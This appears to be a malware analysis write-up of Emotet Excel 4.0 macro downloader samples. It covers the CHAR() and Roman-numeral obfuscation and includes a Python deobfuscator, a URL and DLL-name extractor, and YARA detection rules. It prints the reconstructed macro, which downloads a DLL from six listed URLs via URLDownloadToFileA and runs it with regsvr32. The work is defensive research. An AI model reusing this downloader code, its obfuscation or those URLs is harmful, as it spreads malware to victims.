H20 =8
P20 =CHAR(52+6)
P22 =CHAR(66-5)
K23 =CHAR(80-2)
G24 =CHAR(84-2)
I26 =CHAR(84)
I32 =ARABIC("CXI")
O33 =ARABIC("LXVII")
E35 =ARABIC("LXI")
Q36 =ARABIC("CXIV")
K37 =ARABIC("CI")
## Calculation
### CHAR
### ARABIC
First convert the Roman numeral to an Arabic number:
(WPS does not support `=_xlfn.ARABIC`)
then apply CHAR() to that number:
### Table

| Cell | Formula | Roman numeral | Arabic number | Character |
|---|---|---|---|---|
| E2 | =CHAR(113-2) | | | o |
| G2 | =CHAR(111-6) | | | i |
| L2 | =CHAR(71-6) | | | A |
| C3 | =CHAR(111+3) | | | r |
| I3 | =CHAR(87-4) | | | S |
| P3 | =CHAR(90+2) | | | \ |
| F4 | =CHAR(100-18) | | | R |
| H4 | =CHAR(110-9) | | | e |
| K4 | =1 | | | 1 |
| N4 | =CHAR(89-1) | | | X |
| B5 | =CHAR(115+2) | | | u |
| P5 | =CHAR(44+2) | | | . |
| E6 | =CHAR(90-6) | | | T |
| J6 | =CHAR(77-3) | | | J |
| D7 | =CHAR(107+3) | | | n |
| F7 | =3 | | | 3 |
| M7 | =CHAR(117-2) | | | s |
| P7 | =CHAR(41+3) | | | , |
| C9 | =CHAR(110-2) | | | l |
| H9 | =CHAR(70-3) | | | C |
| K9 | =CHAR(55-7) | | | 0 |
| P9 | =CHAR(55+5) | | | < |
| F10 | =CHAR(123-4) | | | w |
| E11 | =CHAR(80+5) | | | U |
| J11 | =CHAR(80-7) | | | I |
| L11 | =CHAR(100-1) | | | c |
| P11 | =CHAR(35+5) | | | ( |
| A12 | =CHAR(107+2) | | | m |
| D13 | =CHAR(72-4) | | | D |
| H13 | =CHAR(68+1) | | | E |
| N13 | =2 | | | 2 |
| P13 | =CHAR(36+5) | | | ) |
| G14 | =CHAR(124-4) | | | x |
| K14 | =CHAR(70-4) | | | B |
| B15 | =CHAR(80-4) | | | L |
| F15 | =CHAR(105-5) | | | d |
| P15 | =CHAR(31+3) | | | " |
| D17 | =CHAR(102-5) | | | a |
| I17 | =CHAR(78+1) | | | O |
| P17 | =CHAR(40-2) | | | & |
| B18 | =CHAR(65+5) | | | F |
| P19 | =CHAR(32) | | | (space) |
| H20 | =8 | | | 8 |
| P20 | =CHAR(52+6) | | | : |
| P22 | =CHAR(66-5) | | | = |
| K23 | =CHAR(80-2) | | | N |
| G24 | =CHAR(84-2) | | | R |
| I26 | =CHAR(84) | | | T |
| I32 | =ARABIC("CXI") | CXI | 100+10+1 = 111 | o |
| O33 | =ARABIC("LXVII") | LXVII | 50+10+5+1+1 = 67 | C |
| E35 | =ARABIC("LXI") | LXI | 50+10+1 = 61 | = |
| Q36 | =ARABIC("CXIV") | CXIV | 100+10+4 = 114 | r |
| K37 | =ARABIC("CI") | CI | 100+1 = 101 | e |

Note the subtractive pair in CXIV: ARABIC("CXIV") is 114 (`r`), not 100+10+1+5 = 116 (`t`); this is easy to get wrong when converting by hand.
Cell | Value |
---|---|
A12 | m |
B15 | L |
B18 | F |
B5 | u |
C3 | r |
C9 | l |
D13 | D |
D17 | a |
D7 | n |
E11 | U |
E2 | o |
E35 | = |
E6 | T |
F10 | w |
F15 | d |
F4 | R |
F7 | 3 |
G14 | x |
G2 | i |
G24 | R |
H13 | E |
H20 | 8 |
H4 | e |
H9 | C |
I17 | O |
I26 | T |
I3 | S |
I32 | o |
J11 | I |
J6 | J |
K14 | B |
K23 | N |
K37 | e |
K4 | 1 |
K9 | 0 |
L11 | c |
L2 | A |
M7 | s |
N13 | 2 |
N4 | X |
O33 | C |
P11 | ( |
P13 | ) |
P15 | " |
P17 | & |
P19 | (space) |
P20 | : |
P22 | = |
P3 | \ |
P5 | . |
P7 | , |
P9 | < |
Q36 | r |
# Code
## 6EE99C20494D3876BEF6F882CA25DEE2
T() joins the single characters into fragments, and the FORMULA() chain in PFE!B5 joins the fragments, the defined names and a few remaining characters into the final lines:
FORMULA( Rvfs!C15, Rvfs!F3)=FORMULA( Rvfs!P22& Rvfs!H9& Rvfs!L2& Rvfs!B15& Rvfs!B15& PFE!C7& PFE!D11& PFE!E3& Rvfs!F3& Rvfs!L2& PFE!G5& PFE!I9& PFE!F19&!!N14&!!E16,B7)=FORMULA( Rvfs!P22& Rvfs!J11& Rvfs!B18& Rvfs!P11&"UDYQ1"&!!N4& Rvfs!H9& Rvfs!L2& Rvfs!B15& Rvfs!B15& PFE!C7& PFE!D11& PFE!E3& Rvfs!F3& Rvfs!L2& PFE!G5& PFE!I9& PFE!G21&!!N14&!!E16& Rvfs!P13,B9)=FORMULA( Rvfs!P22& Rvfs!J11& Rvfs!B18& Rvfs!P11&"UDYQ2"&!!N4& Rvfs!H9& Rvfs!L2& Rvfs!B15& Rvfs!B15& PFE!C7& PFE!D11& PFE!E3& Rvfs!F3& Rvfs!L2& PFE!G5& PFE!I9& PFE!H19&!!N14&!!E16& Rvfs!P13,B11)=FORMULA( Rvfs!P22& Rvfs!J11& Rvfs!B18& Rvfs!P11&"UDYQ3"&!!N4& Rvfs!H9& Rvfs!L2& Rvfs!B15& Rvfs!B15& PFE!C7& PFE!D11& PFE!E3& Rvfs!F3& Rvfs!L2& PFE!G5& PFE!I9& PFE!I21&!!N14&!!E16& Rvfs!P13,B13)=FORMULA( Rvfs!P22& Rvfs!J11& Rvfs!B18& Rvfs!P11&"UDYQ4"&!!N4& Rvfs!H9& Rvfs!L2& Rvfs!B15& Rvfs!B15& PFE!C7& PFE!D11& PFE!E3& Rvfs!F3& Rvfs!L2& PFE!G5& PFE!I9& PFE!J19&!!N14&!!E16& Rvfs!P13,B15)=FORMULA( Rvfs!P22& Rvfs!J11& Rvfs!B18& Rvfs!P11&"UDYQ5"&!!N4& Rvfs!H9& Rvfs!L2& Rvfs!B15& Rvfs!B15& PFE!C7& PFE!D11& PFE!E3& Rvfs!F3& Rvfs!L2& PFE!G5& PFE!I9& PFE!K21&!!N14&!!E16& Rvfs!P13,B17)=FORMULA( Rvfs!P22& Rvfs!J11& Rvfs!B18& Rvfs!P11&"UDYQ6"&!!N4& Rvfs!H9& Rvfs!B15& Rvfs!I17& Rvfs!I3& Rvfs!H13& Rvfs!P11& Rvfs!K9& Rvfs!P13& Rvfs!P7& Rvfs!P13,B21)=FORMULA( Rvfs!P22& Rvfs!H13& Rvfs!N4& Rvfs!H13& Rvfs!H9& Rvfs!P11& Rvfs!P15& Rvfs!H9& Rvfs!P20&!!D3&!!J6&!!F11&!!P8&!!B5& Rvfs!P15& Rvfs!P13,B23)=FORMULA( Rvfs!P22&!!R6& Rvfs!P11& Rvfs!P13,B28)
Some of the concatenated fragments (B5 here is the T() cell referenced as `!!B5`, not Rvfs!B5, which holds `u`):

Cell | Fragment |
---|---|
E3 | DownloadToFil |
G5 | ","JJCCBB" |
C7 | ("url |
I9 | ,0, |
D11 | mon","URL |
N4 | <0, |
B5 |  ..\adw.dll |
P8 |  -s (P2 is not in the dump; the EXEC line shows it evaluates to `-`) |
N14 | ..\adw.dll |
E16 | ",0,0) |

The main functional code is as follows. UDYQ1 to UDYQ6 are the defined names listed in the LABEL records above; each points at the cell written by the previous FORMULA() step (B7, B9, ... B17), so every further download is attempted only if the previous URLDownloadToFileA call returned a failure HRESULT (negative). If the last one fails too, CLOSE(0) closes the workbook; otherwise the DLL is run through regsvr32:

```
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://church.ktc-center.net/PbSkdCOW/","..\adw.dll",0,0)
=IF(UDYQ1<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://chobemaster.com/components/gus/","..\adw.dll",0,0))
=IF(UDYQ2<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://christianchapman.com/cgi-bin/gADHL9UXSFUTN/","..\adw.dll",0,0))
=IF(UDYQ3<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://chmiola.net/audio/6OuzyjPS/","..\adw.dll",0,0))
=IF(UDYQ4<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://clanfog.co.uk/_vti_bin/aObJD8vpKaJRLKgoX6i/","..\adw.dll",0,0))
=IF(UDYQ5<0,CALL("urlmon","URL DownloadToFileA","JJCCBB",0,"https://cipes.gob.mx/css/A046XJg/","..\adw.dll",0,0))
=IF(UDYQ6<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\adw.dll")
=RETURN()
```
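The whole "restore the strings" procedure above (CHAR() arithmetic, ARABIC() Roman numerals, T()/CONCATENATE() joins, and the FORMULA() chain that writes the finished lines into cells) can be done in one pass instead of by hand. The following is an added example written for this article; it is not the author's script and not an oletools feature. Its input is a constructed dict copied from the cell dump above and reduced to the cells that build the first CALL(...) line. Cells are keyed by address only, because in that dump the sheet named in a 3-D reference (`PFE!E3`, `!!N14`) is not the sheet olevba lists the cell under (`Rvfs,E3`), and the FORMULA() chain is kept in its own constant because its cell address B5 is reused on another sheet. The URL cell `PFE!F19` is not in the dump, so it stays as a visible placeholder in the output, which is exactly the cell the extractor later in this article goes looking for.

```python
import re

# Constructed input, copied from the olevba cell dump earlier on this page and reduced
# to the cells that build the first CALL(...) line of 6EE99C20494D3876BEF6F882CA25DEE2.
# Keyed by cell address only: in that dump the sheet in a 3-D reference (PFE!E3, !!N14)
# is not the sheet olevba lists the cell under (Rvfs,E3), so sheet names are not usable.
CELLS = {
    "E2": "CHAR(113-2)", "G2": "CHAR(111-6)", "L2": "CHAR(71-6)", "C3": "CHAR(111+3)",
    "P3": "CHAR(90+2)", "F4": "CHAR(100-18)", "B5": "CHAR(115+2)", "P5": "CHAR(44+2)",
    "E6": "CHAR(90-6)", "J6": "CHAR(77-3)", "D7": "CHAR(107+3)", "P7": "CHAR(41+3)",
    "C9": "CHAR(110-2)", "H9": "CHAR(70-3)", "K9": "CHAR(55-7)", "F10": "CHAR(123-4)",
    "E11": "CHAR(80+5)", "P11": "CHAR(35+5)", "A12": "CHAR(107+2)", "D13": "CHAR(72-4)",
    "P13": "CHAR(36+5)", "K14": "CHAR(70-4)", "B15": "CHAR(80-4)", "F15": "CHAR(105-5)",
    "P15": "CHAR(31+3)", "D17": "CHAR(102-5)", "B18": "CHAR(65+5)", "P22": "CHAR(66-5)",
    "K4": "1.00000000000000000000",                     # numeric constant, no formula
    "K37": '_xlfn.ARABIC("CI")',                        # Roman numeral -> 101
    "C15": "CHAR( Rvfs!K37)",                           # CHAR() over an ARABIC() cell -> "e"
    "E3": "T( Rvfs!D13& Rvfs!E2& Rvfs!F10& Rvfs!D7& Rvfs!C9& Rvfs!E2& Rvfs!D17& Rvfs!F15& Rvfs!E6& Rvfs!E2& Rvfs!B18& Rvfs!G2& Rvfs!C9)",
    "G5": "T( Rvfs!P15& Rvfs!P7& Rvfs!P15& Rvfs!J6& Rvfs!J6& Rvfs!H9& Rvfs!H9& Rvfs!K14& Rvfs!K14& Rvfs!P15)",
    "C7": "T( Rvfs!P11& Rvfs!P15& Rvfs!B5& Rvfs!C3& Rvfs!C9)",
    "I9": "T( Rvfs!P7& Rvfs!K9& Rvfs!P7)",
    "D11": "T( Rvfs!A12& Rvfs!E2& Rvfs!D7& Rvfs!P15& Rvfs!P7& Rvfs!P15& Rvfs!E11& Rvfs!F4& Rvfs!B15)",
    "N14": "T( Rvfs!P5& Rvfs!P5& Rvfs!P3& Rvfs!D17& Rvfs!F15& Rvfs!F10& Rvfs!P5& Rvfs!F15& Rvfs!C9& Rvfs!C9)",
    "E16": "T( Rvfs!P15& Rvfs!P7& Rvfs!K9& Rvfs!P7& Rvfs!K9& Rvfs!P13)",
    "D10": "CONCATENATE( Shee!F15, Shee!C9, Shee!C9, Shee!P15)",   # from the second sample
}
# The first two FORMULA() steps of PFE!B5; PFE!F19 (the URL cell) is deliberately absent.
CHAIN = ("FORMULA( Rvfs!C15, Rvfs!F3)=FORMULA( Rvfs!P22& Rvfs!H9& Rvfs!L2& Rvfs!B15& Rvfs!B15&"
         " PFE!C7& PFE!D11& PFE!E3& Rvfs!F3& Rvfs!L2& PFE!G5& PFE!I9& PFE!F19&!!N14&!!E16,B7)")

ROMAN = {"I": 1, "V": 5, "X": 10, "L": 50, "C": 100, "D": 500, "M": 1000}


def roman_to_int(s):
    """ARABIC(): a numeral smaller than its right neighbour is subtracted, so CXIV -> 114."""
    vals = [ROMAN[c] for c in s]
    return sum(-v if i + 1 < len(vals) and vals[i + 1] > v else v for i, v in enumerate(vals))


class XlmDeobfuscator:
    def __init__(self, cells):
        self.cells, self.memo = dict(cells), {}

    def operand(self, tok):
        """One token inside CHAR()/T()/CONCATENATE()/FORMULA(): literal, arithmetic or reference."""
        tok = tok.strip()
        if tok.startswith('"'):                               # "UDYQ1"-style literal
            return tok.strip('"')
        m = re.fullmatch(r"(\d+)\s*([+-])\s*(\d+)", tok)       # CHAR(113-2)
        if m:
            return str(int(m[1]) + int(m[3]) if m[2] == "+" else int(m[1]) - int(m[3]))
        if tok.isdigit():                                     # CHAR(32)
            return tok
        ref = tok.rpartition("!")[2]                          # "Rvfs!D13" / "!!N14" -> D13 / N14
        return self.value(ref) if ref in self.cells else "<%s>" % tok   # unknown cell: placeholder

    def value(self, ref):
        """Evaluate one cell to the text Excel would show for it."""
        if ref not in self.memo:
            f = self.cells[ref]
            if re.fullmatch(r"[0-9.]+", f):
                self.memo[ref] = str(int(float(f)))           # 1.0000... -> "1"
            elif f.startswith("CHAR("):
                self.memo[ref] = chr(int(self.operand(f[5:-1])))
            elif f.startswith("_xlfn.ARABIC("):
                self.memo[ref] = str(roman_to_int(f[13:-1].strip('"')))
            elif f.startswith("T("):
                self.memo[ref] = "".join(map(self.operand, f[2:-1].split("&")))
            elif f.startswith("CONCATENATE("):
                self.memo[ref] = "".join(map(self.operand, f[12:-1].split(",")))
            else:
                self.memo[ref] = f                            # plain text written by FORMULA()
        return self.memo[ref]

    def run_formula_chain(self, chain):
        """FORMULA(expr,target)=FORMULA(...)=...: each step writes the evaluated expr into
        target, and later steps read it back (Rvfs!F3 exists only after the first step).
        Returns [(target, generated formula)] in execution order."""
        out = []
        for step in chain.split(")=FORMULA("):
            expr, target = step.removeprefix("FORMULA(").removesuffix(")").rsplit(",", 1)
            text = "".join(map(self.operand, expr.split("&")))
            ref = target.strip().rpartition("!")[2]
            self.cells[ref] = self.memo[ref] = text
            out.append((ref, text))
        return out


def reconstruct(cells=CELLS, chain=CHAIN):
    return XlmDeobfuscator(cells).run_formula_chain(chain)


if __name__ == "__main__":
    for ref, text in reconstruct():
        print(ref, "->", text)
```

Running it prints `F3 -> e` first (the opening FORMULA() copies the ARABIC-derived `e` into F3, which is why the T() fragment `DownloadToFil` ends without its `e`) and then the assembled `=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,<PFE!F19>..\adw.dll",0,0)`. The remaining steps of the chain are processed the same way; the `"UDYQ1"` literals pass through unchanged because quoted tokens are kept as text.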
## FBE4106C4303401DF89F6CFF0B1DBABC
' Ufbd,D5,T( Shee!P11& Shee!P15& Shee!B5& Shee!C3& Shee!C9& Shee!A12),""
' Ufbd,N6,T( Shee!E2& Shee!D17& Shee!F15& Shee!E6& Shee!E2& Shee!B18& Shee!G2& Shee!C9),""
' Ufbd,F11,T( Shee!E2& Shee!D7& Shee!P15& Shee!P7& Shee!P15& Shee!E11& Shee!F4& Shee!B15& Shee!D13),""
' Ufbd,P14,T( Shee!L2& Shee!P15& Shee!P7& Shee!P15& Shee!J6& Shee!J6& Shee!H9& Shee!H9& Shee!K14& Shee!K14& Shee!P15),""
' Ufbd,Q23,T( Shee!P2& Shee!M7),""
' Pdvse,E15,T( Shee!P19& Shee!P5& Shee!P5& Shee!P3& Shee!L11& Shee!M7& Shee!H4& Shee!G2& Shee!P5),""
' Pdvse,E23,T( Shee!E2& Shee!F10& Shee!D7& Shee!C9),""
' Pdvse,R24,T( Shee!P5& Shee!P5& Shee!P3& Shee!L11& Shee!M7& Shee!H4& Shee!G2& Shee!P5),""
' DD,D10,"CONCATENATE( Shee!F15, Shee!C9, Shee!C9, Shee!P15)",""
' PKEBEB,E9,"FORMULA( Shee!P22& Shee!H9& Shee!L2& Shee!B15& Shee!B15& Pdvse!D5& Pdvse!F11& DD!E23& Pdvse!N6& Shee!H4& Pdvse!P14& DD!L19& Pdvse!E17& DD!R24& PKEBEB!D10& DD!H18,E11)=FORMULA( Shee!P22& Shee!J11& Shee!B18& Shee!P11&"GRDS1"& DD!S7& Shee!H9& Shee!L2& Shee!B15& Shee!B15& Pdvse!D5& Pdvse!F11& DD!E23& Pdvse!N6& Shee!H4& Pdvse!P14& DD!L19& Pdvse!E19& DD!R24& PKEBEB!D10& DD!H18& Shee!P13,E13)=FORMULA( Shee!P22& Shee!J11& Shee!B18& Shee!P11&"GRDS2"& DD!S7& Shee!H9& Shee!L2& Shee!B15& Shee!B15& Pdvse!D5& Pdvse!F11& DD!E23& Pdvse!N6& Shee!H4& Pdvse!P14& DD!L19& Pdvse!G17& DD!R24& PKEBEB!D10& DD!H18& Shee!P13,E15)=FORMULA( Shee!P22& Shee!J11& Shee!B18& Shee!P11&"GRDS3"& DD!S7& Shee!H9& Shee!L2& Shee!B15& Shee!B15& Pdvse!D5& Pdvse!F11& DD!E23& Pdvse!N6& Shee!H4& Pdvse!P14& DD!L19& Pdvse!G19& DD!R24& PKEBEB!D10& DD!H18& Shee!P13,E17)=FORMULA( Shee!P22& Shee!J11& Shee!B18& Shee!P11&"GRDS4"& DD!S7& Shee!H9& Shee!L2& Shee!B15& Shee!B15& Pdvse!D5& Pdvse!F11& DD!E23& Pdvse!N6& Shee!H4& Pdvse!P14& DD!L19& Pdvse!I17& DD!R24& PKEBEB!D10& DD!H18& Shee!P13,E19)=FORMULA( Shee!P22& Shee!J11& Shee!B18& Shee!P11&"GRDS5"& DD!S7& Shee!H9& Shee!L2& Shee!B15& Shee!B15& Pdvse!D5& Pdvse!F11& DD!E23& Pdvse!N6& Shee!H4& Pdvse!P14& DD!L19& Pdvse!I19& DD!R24& PKEBEB!D10& DD!H18& Shee!P13,E21)=FORMULA( Shee!P22& Shee!J11& Shee!B18& Shee!P11&"GRDS6"& DD!S7& Shee!H9& Shee!B15& Shee!I17& Shee!I3& Shee!H13& Shee!P11& Shee!K9& Shee!P13& Shee!P7& Shee!P13,E23)=FORMULA( Shee!P22& Shee!H13& Shee!N4& Shee!H13& Shee!H9& Shee!P11& Shee!P15& Shee!H9& Shee!P20& DD!O14& DD!P10& DD!K6& Shee!P19& Pdvse!Q23& DD!E15& PKEBEB!D10& Shee!P13,E25)=FORMULA( Shee!P22& Shee!G41& Shee!P11& Shee!P13,E27)",""
The main differences are the download URLs and the DLL name; the skeleton of the download code is otherwise the same, with minor variations in how the strings are joined (FBE4106C4303401DF89F6CFF0B1DBABC also uses CONCATENATE). As download code it has not changed much.
# Extraction
For this version of the Emotet downloader specifically, the data that is useful and meaningful to me is:
- The download URLs
  The cell contents can be read with Python; regex-match the strings that contain several `"&"` substrings, then delete the `"&"` substrings with replace().
- The downloaded file name
  Always assembled with T(); its signature is a leading ` ..\` or a trailing `.dll`.
  If the same single-character sheet is used, ` ..\[dll name].dll` corresponds to the formula `=T([chars]!P19&[chars]!P5&[chars]!P5&[chars]!P3(&[chars]!<letter cell>){3,4}&[chars]!P5&[chars]!F15&[chars]!C9&[chars]!C9)`:
  File name structure: ` ..\[a-z]+.dll`
  - prefix ` ..\`: one space, two `.` and a `\`;
  - middle: the part to extract, so far always 3 to 4 lowercase letters;
  - suffix `.dll`: `.`, `d` and two `l`.
  The structure is quite fixed, especially the doubled references (P5&P5, C9&C9); even if the character mapping changes, this pattern can still be used to flag candidates. (When extraction with the currently known character mapping yields nothing, warn that the mapping may have been replaced.)

But when I read the data from Excel with Python, I found that Python had already computed the values, unlike what I had imagined (😅), which was that they would be stored as macro code:
## Python code

- Walk the folder, check whether each file is an xls file, collect those and open them one by one
- After opening the workbook, get sheets [2] and [3]
- Walk the cells of each sheet and keep only those that hold data
- Restore the URLs
  - Walk the data cells of sheet [2] and check whether they contain:
    - `"&"`: delete every `"&"`, then regex-extract the URL with `[/"](.*?)[/",]"`
    - `://`: regex-extract the URL with `://(.*?)","`
  - Check whether there are exactly 6 of them (the pattern seen so far; only a hint, it does not affect extraction)
- Extract the DLL name
  - Walk the data cells of sheet [3] and check whether they contain `..\` or `.dll`
  - If so, regex-extract: first `\\(.*?)\.dll`, then `\\(.*?)\.`
  - Check that the regex yields exactly one result, otherwise warn

```python
import os
import re

import pandas as pd

strNewLine = "\r\n"


# Collect the non-NaN cells of a sheet into a flat list of strings.
# pandas (via xlrd) returns the cached values Excel stored for each cell, not the
# formulas, so the T()/CHAR() cells already arrive as their evaluated text.
def GetValue2List(df):
    nRow = df.shape[0]
    nColumn = df.shape[1]
    listValue = []
    for iRow in range(nRow):
        for iColumn in range(nColumn):
            value = str(df.iloc[iRow, iColumn])
            if value != 'nan':
                listValue.append(value)
    # print(listValue)
    return listValue


def RevivifyURL(listSheetURL):
    # print(listSheetURL)
    reURL1 = re.compile(r'[/"](.*?)[/\",\"]"')
    reURL2 = re.compile(r'://(.*?)\",\"', re.I)
    listURL = []
    for i in listSheetURL:
        strURL = ''
        # Storage form 1: pieces joined with "&"
        if '"&"' in i:
            # print(i)
            strCode = i.replace('"&"', '')
            strURL = reURL1.findall(strCode)[0]
        # Storage form 2: stored directly
        elif '://' in i:
            # print(i)
            strURL = reURL2.findall(i)[0]
        if (strURL != '') and (strURL not in listURL):
            print(strURL)
            listURL.append(strURL)
    if len(listURL) == 6:
        # print(listURL)
        pass
    else:
        print("🤔🤔🤔Please analyse manually🤔🤔🤔 the number of URLs is not 6")
    return listURL


def RevivifyDll(listSheetDll):
    # print(listSheetDll)
    # Match 1: \\(.*?)\.dll  -> starts with "\", ends with ".dll"
    # Match 2: \\(.*?)\.     -> starts with "\", ends with "."
    reDll1 = re.compile(r'\\(.*?)\.dll', re.I)
    # Fixed: the original pattern began with "|", an empty alternative that matches
    # everywhere, so findall() only ever returned empty strings.
    reDll2 = re.compile(r'\\(.*?)\.', re.I)
    listDll = []
    listRe = []
    for i in listSheetDll:
        if ('..\\' in i) or ('.dll' in i):
            # print(i)
            listRe1 = reDll1.findall(i)
            # print(listRe1)
            listRe.extend(listRe1)
            if len(listRe1) == 0:
                listRe2 = reDll2.findall(i)
                # print(listRe2)
                listRe.extend(listRe2)
                if len(listRe2) == 0:
                    print("🤔🤔🤔Please analyse manually🤔🤔🤔 neither regex matched a DLL name")
    if len(listRe) != 0:
        for iRe in listRe:
            if (iRe != '') and (iRe not in listDll):
                listDll.append(iRe)
    # print(listDll)
    if len(listDll) == 1:
        strDllName = listDll[0]
        print("DLL name:", strDllName, strNewLine)
        return strDllName
    print("🤔🤔🤔Please analyse manually🤔🤔🤔 the DLL name format was not matched by the regex")
    return None


def ExtractEmotetIoCs(pathExcel):
    # sheet_name=None returns a dict {sheet name: DataFrame} in workbook order
    dfExcel = pd.read_excel(pathExcel, sheet_name=None)
    listKeys = list(dfExcel.keys())
    # The URLs are in the 2nd hidden sheet
    dfURL = dfExcel[listKeys[2]]
    listSheetURL = GetValue2List(dfURL)
    RevivifyURL(listSheetURL)
    # The DLL name is in the 3rd hidden sheet
    dfDll = dfExcel[listKeys[3]]
    listSheetDll = GetValue2List(dfDll)
    RevivifyDll(listSheetDll)


# Walk a directory and run the extractor on every file in it
def EnumDirGetExcelFilePath(pathDir):
    print("Directory walked:", pathDir)
    for root, dirs, files in os.walk(pathDir):
        for file in files:
            print(file)
            pathFile = os.path.join(root, file)
            # print(pathFile)
            ExtractEmotetIoCs(pathFile)


pathFileExcel = "6EE99C20494D3876BEF6F882CA25DEE2.Emotet"
pathDir = r"C:\Users\Administrator\Desktop\Emotet文档"

if __name__ == '__main__':
    # Single file
    # ExtractEmotetIoCs(pathFileExcel)
    # Whole directory
    EnumDirGetExcelFilePath(pathDir)
    print("🥳🥳🥳Finished🥳🥳🥳")
```
## Run result
![image.png](https://cdn.nlark.com/yuque/0/2022/png/1632223/1648803844157-cca20959-1aed-4cb4-82a4-97ab8cb486af.png#clientId=u15f9ce3d-53c4-4&from=paste&height=615&id=Q0ygM&originHeight=615&originWidth=545&originalType=binary&ratio=1&rotation=0&showTitle=false&size=96025&status=done&style=none&taskId=ub171be70-970c-477b-bbe2-d1d2bce074d&title=&width=545)
# Additional notes
## YARA
The YARA rules below all come from the rules aggregated on VirusTotal:
### Microsoft_Excel_Hidden_Macrosheet
```yara
rule Microsoft_Excel_Hidden_Macrosheet
{
meta:
author = "InQuest Labs"
description = "This signature detects Microsoft Excel spreadsheets that contain hidden sheets. Presence of a hidden sheet alone is not indication of malicious behavior."
created_date = "2022-03-15"
updated_date = "2022-03-15"
blog_reference = "https://support.office.com/en-us/article/hide-or-show-worksheets-or-workbooks-69f2701a-21f5-4186-87d7-341a8cf53344"
labs_reference = "https://labs.inquest.net/dfi/sha256/127c67df5629ff69f67328d0c5c92c606ac7caebf6106aaee8364a982711c120"
labs_pivot = "https://labs.inquest.net/dfi/search/alert/Excel%20Macro%20Manipulates%20Hidden%20Sheets"
samples = "127c67df5629ff69f67328d0c5c92c606ac7caebf6106aaee8364a982711c120"
strings:
$ole_marker = {D0 CF 11 E0 A1 B1 1A E1}
$macro_sheet_h1 = {85 00 ?? ?? ?? ?? ?? ?? 01 01}
$macro_sheet_h2 = {85 00 ?? ?? ?? ?? ?? ?? 02 01}
$hidden_xlsx_01 = /hidden\s*=\s*["'][12]["']/ nocase
$hidden_xlsx_02 = /state\s*=\s*["'](very)?Hidden["']/ nocase
condition:
($ole_marker at 0 and 1 of ($macro_sheet_h*))
or
any of ($hidden_xlsx*)
}
```

### SUSP_Excel4Macro_AutoOpen

```yara
rule SUSP_Excel4Macro_AutoOpen
{
meta:
description = "Detects Excel4 macro use with auto open / close"
author = "John Lambert @JohnLaTwC"
date = "2020-03-26"
score = 50
hash="2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f"
strings:
$header_docf = { D0 CF 11 E0 }
$s1 = "Excel" fullword
// 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
// ' 0018 23 LABEL : Cell Value, String Constant - build-in-name 1 Auto_Open
// 00002d80:
// 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a 01 00 16 00 07 00
// f4c01e26eb88b72d38be3d6331fafe03b1ae53fdbff57d610173ed797fa26e73
// 00003460: 00 00 18 00 17 00 20 00 00 01 07 00 00 00 00 00 ...... .........
// 00003470: 00 00 00 00 00 01 3a 00 00 3f 02 8d 00 c1 01 08 ......:..?......
// ccef64586d25ffcb2b28affc1f64319b936175c4911e7841a0e28ee6d6d4a02d
// ' 0018 23 LABEL : Cell Value, String Constant - build-in-name 1 Auto_Open
// 00003560: 00 00 00 00 00 18 00 17 00 aa 03 00 01 07 00 00 ................
// 00003570: 00 00 00 00 00 00 00 00 01 3a 00 00 04 00 65 00 .........:....e.
$Auto_Open = {18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a }
$Auto_Close = {18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a }
$Auto_Open1 = {18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a }
$Auto_Close1= {18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a }
// some Excel4 files don't have auto_open names e.g.:
// b8b80e9458ff0276c9a37f5b46646936a08b83ce050a14efb93350f47aa7d269
// 079be05edcd5793e1e3596cdb5f511324d0bcaf50eb47119236d3cb8defdfa4c
condition:
filesize < 3000KB
and $header_docf at 0
and $s1
and any of ($Auto_*)
}
```

### Office_Document_with_VBA_Project

```yara
rule Office_Document_with_VBA_Project
{
meta:
author = "InQuest Labs"
description = "This signature detects an office document with an embedded VBA project. While this is fairly common it is sometimes used for malicious intent."
created_date = "2022-03-15"
updated_date = "2022-03-15"
blog_reference = "http://msdn.microsoft.com/en-us/library/office/aa201751%28v=office.10%29.aspx"
labs_reference = "https://labs.inquest.net/dfi/sha256/8a89a5c5dc79d4f8b8dd5007746ae36a3b005d84123b6bbc7c38637f43705023"
labs_pivot = "N/A"
samples = "8a89a5c5dc79d4f8b8dd5007746ae36a3b005d84123b6bbc7c38637f43705023"
strings:
$magic1 = /^\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1\x00\x00\x00/
$magic2 = /^\x50\x4B\x03\x04\x14\x00\x06\x00/
$vba_project1 = "VBA_PROJECT" wide nocase
$vba_project2 = "word/vbaProject.binPK"
condition:
(($magic1 at 0) or ($magic2 at 0)) and any of ($vba_project*)
}
```